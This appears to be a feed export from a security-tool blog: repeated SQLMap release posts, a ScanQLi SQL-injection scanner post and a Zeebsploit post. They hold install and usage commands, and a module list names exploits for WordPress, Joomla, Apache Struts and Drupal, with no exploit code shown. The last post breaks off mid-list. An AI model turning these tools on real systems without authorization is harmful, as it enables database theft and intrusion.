Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-65636274979411689342019-07-02T09:30:00.000-04:002019-07-02T09:30:08.820-04:00SQLMap v1.3.7 - Automatic SQL Injection And Database Takeover Tool<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-aZz_tvFN7tU/XRqQbv82EyI/AAAAAAAAPfQ/b4akHPZafAALI96b0U5FmMMnfgZ188FDwCLcBGAs/s1600/sqlmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="622" src="https://1.bp.blogspot.com/-aZz_tvFN7tU/XRqQbv82EyI/AAAAAAAAPfQ/b4akHPZafAALI96b0U5FmMMnfgZ188FDwCLcBGAs/s1600/sqlmap.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support to <strong>directly connect to the database</strong> without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support to enumerate <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support to <strong>dump database tables</strong> entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support to <strong>search for specific database names, specific tables across all databases or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.</li>
<li style="text-align: justify;">Support to <strong>download and upload any file</strong> from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>execute arbitrary commands and retrieve their standard output</strong> on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>establish an out-of-band stateful TCP connection between the attacker machine and the database server</strong> underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.</li>
<li style="text-align: justify;">Support for <strong>database process' user privilege escalation</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<b><span style="font-size: large;">Demo</span></b><br />
<div style="text-align: center;">
<script async="" id="asciicast-46601" src="https://asciinema.org/a/46601.js"></script>
</div>
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<span style="font-size: large;"><b>Translations</b></span><br />
<ul>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md" rel="nofollow" target="_blank">Bulgarian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md" rel="nofollow" target="_blank">Chinese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md" rel="nofollow" target="_blank">Croatian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md" rel="nofollow" target="_blank">French</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md" rel="nofollow" target="_blank">Greek</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md" rel="nofollow" target="_blank">Indonesian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md" rel="nofollow" target="_blank">Italian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md" rel="nofollow" target="_blank">Japanese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md" rel="nofollow" target="_blank">Portuguese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md" rel="nofollow" target="_blank">Spanish</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md" rel="nofollow" target="_blank">Turkish</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.3.7</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-11241454397081753432019-04-29T17:34:00.000-04:002019-04-29T17:34:09.145-04:00ScanQLi - Scanner To Detect SQL Injection Vulnerabilities<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-47y4IV5dDdw/XMURIKJzyjI/AAAAAAAAOtY/DA8ZpRFPlaU3e2dPYzGmXBymqq3rsIGYQCLcBGAs/s1600/ScanQLi_4_scanqli.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="257" data-original-width="934" height="176" src="https://2.bp.blogspot.com/-47y4IV5dDdw/XMURIKJzyjI/AAAAAAAAOtY/DA8ZpRFPlaU3e2dPYzGmXBymqq3rsIGYQCLcBGAs/s640/ScanQLi_4_scanqli.jpeg" width="640" /></a></div>
<br />
<div style="text-align: justify;">
ScanQLi is a simple SQL <a href="https://www.kitploit.com/search/label/Injection" target="_blank" title="injection">injection</a> <a href="https://www.kitploit.com/search/label/Scanner" target="_blank" title="scanner">scanner</a> with somes additionals features. This tool can't exploit the SQLi, it just detect them. <em>Tested on <a href="https://www.kitploit.com/search/label/Debian" target="_blank" title="Debian">Debian</a> 9</em></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-size: large;"><b>Features</b></span></div>
<ul>
<li style="text-align: justify;"> Classic<br />
</li>
<li style="text-align: justify;"> Blind<br />
</li>
<li style="text-align: justify;"> Time based<br />
</li>
<li style="text-align: justify;"> <em>GBK (soon)</em><br />
</li>
<li style="text-align: justify;"> Recursive <a href="https://www.kitploit.com/search/label/Scan" target="_blank" title="scan">scan</a> (follow all hrefs of the scanned web site)<br />
</li>
<li style="text-align: justify;"> Cookies integration<br />
</li>
<li style="text-align: justify;"> Adjustable wait delay between requests<br />
</li>
<li style="text-align: justify;"> Ignore given URLs</li>
</ul>
<a name='more'></a><br />
<span style="font-size: large;"><b>Prerequisites</b></span><br />
<strong>1.</strong> Install git tool<br />
<pre><code>apt update
apt install git</code></pre>
<strong>2.</strong> Clone the repo.<br />
<pre><code>git clone https://github.com/bambish/ScanQLi</code></pre>
<strong>3.</strong> Install python required libs<br />
<pre><code>apt install python-pip
cd ScanQLi
pip install -r requirements.txt</code></pre>
<em>For python3 please install <strong>python3-pip</strong> and use <strong>pip3</strong></em><br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
<pre><code>./scanqli -u [URL] [OPTIONS]</code></pre>
<br />
<span style="font-size: large;"><b>Examples</b></span><br />
Simple url scan with output file<br />
<pre><code>python scanqli.py -u 'http://127.0.0.1/test/?p=news' -o output.log</code></pre>
Recursive URL <a href="https://www.kitploit.com/search/label/Scanning" target="_blank" title="scanning">scanning</a> with cookies<br />
<pre><code>python scanqli.py -u 'https://127.0.0.1/test/' -r -c '{"PHPSESSID":"4bn7uro8qq62ol4o667bejbqo3" , "Session":"Mzo6YWMwZGRmOWU2NWQ1N2I2YTU2YjI0NTMzODZjZDVkYjU="}'</code></pre>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/bambish/ScanQLi" rel="nofollow" target="_blank" title="Download ScanQLi">Download ScanQLi</a></span></b><br />
<b><br /></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-68991414791589014192019-04-15T01:24:00.001-04:002019-04-15T01:24:48.129-04:00Zeebsploit - Web Scanner / Exploitation / Information Gathering<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-7v--PzzsDpY/XKeNIVzS2xI/AAAAAAAAOf0/-a_d1NCPy1w7lEDH2t8rkMAF2ZW_3YvTACLcBGAs/s1600/Zeebsploit_4_Zeebsploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1600" data-original-width="1600" height="640" src="https://3.bp.blogspot.com/-7v--PzzsDpY/XKeNIVzS2xI/AAAAAAAAOf0/-a_d1NCPy1w7lEDH2t8rkMAF2ZW_3YvTACLcBGAs/s640/Zeebsploit_4_Zeebsploit.png" width="640" /></a></div>
<br />
zeebsploit is a tool for hacking<br />
<br />
searching for web information and<br />
<br />
scanning vulnerabilities of a web<br />
<br />
<a name='more'></a><br />
<br />
<span style="font-size: x-large;"><b>Installation & Usage</b></span><br />
<pre><code>apt-get install git
git clone https://github.com/jaxBCD/Zeebsploit.git
cd Zeebsploit
chmod +x install
./install
python3 zeebsploit.py
type 'help' for show modules
and follow instruction</code></pre>
<br />
<span style="font-size: large;"><b>Modules</b></span><br />
<pre><code>[Main modules]
+----------+-------------------------------+
| Modules | Description |
+----------+-------------------------------+
| Exploit | Exploitation Modules |
| Scanners | Scanners Modules |
| infoga | information Gathering Modules |
+----------+-------------------------------+
[Exploit Modules]
+---------------------------+--------------------------------------------------+
| Modules | Description |
+---------------------------+--------------------------------------------------+
| wp content injection | wordpress content injection version 4.7 or 4.7.1 |
| wp revslider | wordpress plugin revslider remote file upload |
| wp learndash | wordpress leardash remote file upload |
| wp swhobiz | wordpress plugin showbiz remote file upload |
| joomla com fabrik | joomla component fabrik file upload |
| joomla manager get config | joomla component manager auto get config |
| joomla jdownload | joomla component jdownloads remote file upload |
| joomla | Joomla ads manager component auto shell upload |
| apache struts rce | CVE: 2017-5638 - Apache Struts2 S2-045 |
| | remote command execution |
| drupal8 rce | drupal version 8 remote command execution |
| dvr cam leak credential | TBK DVR4104 / DVR4216 |
| | - Credentials Leak (Get User and password |
| webdav file upload | Nothing |
| ---More--- | Coming Soon the following version |
+---------------------------+--------------------------------------------------+
[Scanner Module]
+--------------------+----------------------------------------+
| Modules | Description |
+--------------------+----------------------------------------+
| subdomain scanner | Scan Subdomain for Web |
| sqli scanner | Scan Sql Injection Vulnerability |
| xss scanner | Scan XSS Injection Vulnerability |
| lfi scanner | Local File Includes Scanner etc/passwd |
| admin login finder | Scan Admin Login page |
| directory scanner | scan directory on web us e dirhunt |
| subdomain takeover | scan type subdomain takeover |
| ---More--- | Coming Soon the following version |
+--------------------+----------------------------------------+
[Information Gathering]
+--------------------+------------------------------------------+
| Modules | Description |
+--------------------+------------------------------------------+
| cms detector | a tool for detecting cms on a web |
| port scanner | Scan Open Port use Nmap |
| information header | response header information |
| ip geolocation | detect the location of an ip or host |
| email searcher | searching email from web |
| traceroute | to show the route the package has pas sed |
| robot.txt detector | Scan Robot.txt from Web |
| header information | Response Header Checker |
| whois lookup | looking for registered users or |
| | recipients of Internet resource rights |
| ---More--- | Coming Soon the following version |
+--------------------+------------------------------------------+</code></pre>
<br />
<span style="font-size: large;"><b>Join Team : <a href="https://www.facebook.com/groups/1217219985083200" rel="nofollow" target="_blank" title="[Click This]">[Click This]</a></b></span><br />
<span style="font-size: large;"><b>Contact : <a href="https://www.facebook.com/jaka.lesmana.794628" rel="nofollow" target="_blank" title="[Contact Me]">[Contact]</a></b></span><br />
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/jaxBCD/Zeebsploit" rel="nofollow" target="_blank" title="Download Zeebsploit">Download Zeebsploit</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-2114541133380135692019-01-08T09:07:00.000-03:002019-01-08T09:07:01.984-03:00SQLMap v1.3 - Automatic SQL Injection And Database Takeover Tool<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-GC4nIng0wo0/XDQiHta_EsI/AAAAAAAANsE/416msPc474o479aqD1OoVR5CvAHSA06WACLcBGAs/s1600/sqlmap_1.3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="560" data-original-width="729" height="490" src="https://4.bp.blogspot.com/-GC4nIng0wo0/XDQiHta_EsI/AAAAAAAANsE/416msPc474o479aqD1OoVR5CvAHSA06WACLcBGAs/s640/sqlmap_1.3.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support to <strong>directly connect to the database</strong> without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support to enumerate <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support to <strong>dump database tables</strong> entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support to <strong>search for specific database names, specific tables across all databases or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.</li>
<li style="text-align: justify;">Support to <strong>download and upload any file</strong> from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>execute arbitrary commands and retrieve their standard output</strong> on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>establish an out-of-band stateful TCP connection between the attacker machine and the database server</strong> underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.</li>
<li style="text-align: justify;">Support for <strong>database process' user privilege escalation</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<b><span style="font-size: large;">Demo</span></b><br />
<div style="text-align: center;">
<script async="" id="asciicast-46601" src="https://asciinema.org/a/46601.js"></script>
</div>
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<span style="font-size: large;"><b>Translations</b></span><br />
<ul>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md" rel="nofollow" target="_blank">Bulgarian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md" rel="nofollow" target="_blank">Chinese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md" rel="nofollow" target="_blank">Croatian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md" rel="nofollow" target="_blank">French</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md" rel="nofollow" target="_blank">Greek</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md" rel="nofollow" target="_blank">Indonesian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md" rel="nofollow" target="_blank">Italian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md" rel="nofollow" target="_blank">Japanese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md" rel="nofollow" target="_blank">Portuguese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md" rel="nofollow" target="_blank">Spanish</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md" rel="nofollow" target="_blank">Turkish</a></li>
</ul>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Download SQLMap v1.2.11</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-65598514737474729242018-11-07T17:40:00.000-03:002018-11-07T17:40:01.308-03:00SQLMap v1.2.11 - Automatic SQL Injection And Database Takeover Tool<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-fjbeMsvYLgo/W-CAdJlqSnI/AAAAAAAANGo/BnCH858GUxED98WM14auy_Hs4nVT85xeACLcBGAs/s1600/sqlmap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="532" data-original-width="689" height="494" src="https://2.bp.blogspot.com/-fjbeMsvYLgo/W-CAdJlqSnI/AAAAAAAANGo/BnCH858GUxED98WM14auy_Hs4nVT85xeACLcBGAs/s640/sqlmap.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: justify;">
<b>SQLMap</b> is an open source <a href="http://www.kitploit.com/search/label/Penetration%20Testing%20Tool">penetration testing tool</a> that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful <a href="http://www.kitploit.com/search/label/Detection">detection</a> engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</div>
<a name='more'></a><br />
<div style="text-align: justify;">
<b><span style="font-size: large;">Features</span></b></div>
<ul>
<li style="text-align: justify;">Full support for <strong>MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix</strong> database management systems.</li>
<li style="text-align: justify;">Full support for six SQL injection techniques: <strong>boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band</strong>.</li>
<li style="text-align: justify;">Support to <strong>directly connect to the database</strong> without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.</li>
<li style="text-align: justify;">Support to enumerate <strong>users, password hashes, privileges, roles, databases, tables and columns</strong>.</li>
<li style="text-align: justify;">Automatic recognition of password hash formats and support for <strong>cracking them using a dictionary-based attack</strong>.</li>
<li style="text-align: justify;">Support to <strong>dump database tables</strong> entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.</li>
<li style="text-align: justify;">Support to <strong>search for specific database names, specific tables across all databases or specific columns across all databases' tables</strong>. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.</li>
<li style="text-align: justify;">Support to <strong>download and upload any file</strong> from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>execute arbitrary commands and retrieve their standard output</strong> on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.</li>
<li style="text-align: justify;">Support to <strong>establish an out-of-band stateful TCP connection between the attacker machine and the database server</strong> underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.</li>
<li style="text-align: justify;">Support for <strong>database process' user privilege escalation</strong> via Metasploit's Meterpreter <code>getsystem</code> command.</li>
</ul>
<br />
<span style="font-size: large;"><b>Installation</b></span><br />
You can download the latest tarball by clicking <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">here</a> or latest zipball by clicking <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">here</a>.<br />
Preferably, you can download sqlmap by cloning the <a href="https://github.com/sqlmapproject/sqlmap" rel="nofollow" target="_blank">Git</a> repository:<br />
<pre><code>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</code></pre>
sqlmap works out of the box with <a href="http://www.python.org/download/" rel="nofollow" target="_blank">Python</a> version <strong>2.6.x</strong> and <strong>2.7.x</strong> on any platform.<br />
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
To get a list of basic options and switches use:<br />
<pre><code>python sqlmap.py -h</code></pre>
To get a list of all options and switches use:<br />
<pre><code>python sqlmap.py -hh</code></pre>
You can find a sample run <a href="https://asciinema.org/a/46601" rel="nofollow" target="_blank">here</a>. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the <a href="https://github.com/sqlmapproject/sqlmap/wiki/Usage" rel="nofollow" target="_blank">user's manual</a>.<br />
<br />
<b><span style="font-size: large;">Demo</span></b><br />
<div style="text-align: center;">
<script async="" id="asciicast-46601" src="https://asciinema.org/a/46601.js"></script>
</div>
<br />
<span style="font-size: large;"><b>Links</b></span><br />
<ul>
<li>Homepage: <a href="http://sqlmap.org/" rel="nofollow" target="_blank">http://sqlmap.org</a></li>
<li>Download: <a href="https://github.com/sqlmapproject/sqlmap/tarball/master" rel="nofollow" target="_blank">.tar.gz</a> or <a href="https://github.com/sqlmapproject/sqlmap/zipball/master" rel="nofollow" target="_blank">.zip</a></li>
<li>Commits RSS feed: <a href="https://github.com/sqlmapproject/sqlmap/commits/master.atom" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/commits/master.atom</a></li>
<li>Issue tracker: <a href="https://github.com/sqlmapproject/sqlmap/issues" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/issues</a></li>
<li>User's manual: <a href="https://github.com/sqlmapproject/sqlmap/wiki" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki</a></li>
<li>Frequently Asked Questions (FAQ): <a href="https://github.com/sqlmapproject/sqlmap/wiki/FAQ" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/FAQ</a></li>
<li>Twitter: <a href="https://twitter.com/sqlmap" rel="nofollow" target="_blank">@sqlmap</a></li>
<li>Demos: <a href="http://www.youtube.com/user/inquisb/videos" rel="nofollow" target="_blank">http://www.youtube.com/user/inquisb/videos</a></li>
<li>Screenshots: <a href="https://github.com/sqlmapproject/sqlmap/wiki/Screenshots" rel="nofollow" target="_blank">https://github.com/sqlmapproject/sqlmap/wiki/Screenshots</a></li>
</ul>
<br />
<span style="font-size: large;"><b>Translations</b></span><br />
<ul>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md" rel="nofollow" target="_blank">Bulgarian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md" rel="nofollow" target="_blank">Chinese</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md" rel="nofollow" target="_blank">Croatian</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md" rel="nofollow" target="_blank">French</a></li>
<li><a href="https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md" rel="nofollow" target="_blank">Greek</a></li>
